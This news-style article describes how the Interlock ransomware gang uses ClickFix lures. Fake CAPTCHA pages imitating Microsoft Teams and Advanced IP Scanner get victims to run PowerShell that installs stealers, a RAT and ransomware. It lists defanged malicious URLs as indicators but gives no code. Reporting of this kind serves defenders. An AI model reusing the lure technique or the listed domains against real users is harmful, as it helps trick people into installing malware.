Interlock's New Attacks Revealed!

The infamous Interlock ransomware gang is ramping up its operations by employing innovative ClickFix attacks designed to deceive corporate networks. By masquerading as essential IT tools, they are successfully breaching systems and deploying file-encrypting malware.

What is ClickFix?

ClickFix is a clever social engineering ploy that tricks unsuspecting victims into executing harmful PowerShell commands, all under the guise of fixing a supposed error or performing a self-verification. This nefarious tactic results in the sinister installation of malware on targeted devices.

A Rise in Ransomware Tactics

This isn't the first nor the last time ClickFix has been associated with ransomware infections. However, Interlock’s usage of this method marks a concerning trend among cybercriminals, revealing their increasing sophistication in exploiting human error.

Interlock: The New Face of Ransomware

Launched in late September 2024, Interlock targets FreeBSD servers and Windows systems without operating as a traditional ransomware-as-a-service. Yet, they maintain a disturbing presence on the dark web with a data leak portal, exerting pressure on victims with ransom demands ranging from hundreds of thousands to multi-million-dollar sums.

From Fake Updates to ClickFix Magic!

Previously, Interlock relied on fake browser and VPN client updates to execute their malware. But since January 2025, they've pivoted to the ClickFix strategy, cleverly using at least four deceptive URLs that feature fake CAPTCHA prompts, urging users to run a command to verify their identities.

A Closer Look at the Deception

These fake sites cleverly imitate legitimate platforms like Microsoft and Advanced IP Scanner, with URLs specifically crafted to mislead: - microsoft-msteams[.]com/additional-check.html - microstteams[.]com/additional-check.html - ecologilives[.]com/additional-check.html - advanceipscaner[.]com/additional-check.html Among these, the last URL proved particularly dangerous, directing victims to download a malicious installer.

How the Infection Happens!

By clicking the 'Fix it' button, victims unknowingly copy a harmful PowerShell command to their clipboard. Once executed, this command downloads a 36MB PyInstaller payload while simultaneously opening the legitimate Advanced IP Scanner website to mask the malicious activity.

Malware on the Rise!

This payload installs what appears to be a legitimate software copy while secretly executing an embedded PowerShell script that operates stealthily, registering a Run key in the Windows Registry for persistence and collecting vital system information.

RAT Deployment and Beyond!

Observations suggest Interlock's command and control (C2) server responds with a range of malicious payloads, including LummaStealer, BerserkStealer, and its own Interlock RAT. This malware can exfiltrate files, execute commands, and load malicious DLLs.

The Lateral Move and Data Exfiltration

After gaining initial access, Interlock operators often utilize stolen credentials for lateral movement, frequently employing RDP alongside tools like PuTTY, AnyDesk, and LogMeIn during their attacks. Their endgame involves data exfiltration, uploading stolen files to Azure Blobs controlled by attackers.

A Daily Threat!

The Windows variant of Interlock is programmed to run daily at 08:00 PM. Thanks to its file extension filtering, this strategy prevents multiple encryptions, but serves as an additional redundancy measure.

Evolving Ransom Note Strategies

Recent ransom notes have evolved, focusing more on the legal ramifications of data breaches and the dire consequences if stolen information is leaked to the public.

ClickFix: A Popular Ransomware Tool!

The ClickFix attack method has now been adopted by a broader spectrum of threat actors, including various ransomware gangs and even North Korean hackers, making it one of the most concerning tactics in the cybercrime landscape today.